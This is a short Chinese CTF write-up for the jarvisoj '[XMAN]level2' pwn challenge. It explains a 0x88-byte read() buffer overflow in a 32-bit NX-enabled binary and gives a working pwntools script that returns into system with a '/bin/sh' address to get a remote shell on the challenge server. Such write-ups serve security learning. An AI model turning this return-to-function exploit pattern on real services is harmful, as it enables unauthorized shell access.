欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

jarvisoj——[XMAN]level2

程序员文章站 2022-07-15 15:38:37
...

题目

jarvisoj——[XMAN]level2

Wp

查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。

jarvisoj——[XMAN]level2

ida看一下
jarvisoj——[XMAN]level2

常规的调用,然后看vulnerable_function函数
jarvisoj——[XMAN]level2

很明显的read缓存区溢出,溢出大小为0x88

很好玩的是这个题中有/bin/sh,地址为0x0804A024

jarvisoj——[XMAN]level2
最后溢出结果就是

0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数

那么最后脚本就是:

from pwn import *
sh=remote("pwn2.jarvisoj.com",9878)
payload=0x88*'A'+0x4*'A'+p32(0x08048320)+0x4*'A'+p32(0x0804A024)
sh.send(payload)
sh.interactive()
sh.close()

最后拿到flag

相关标签: oscp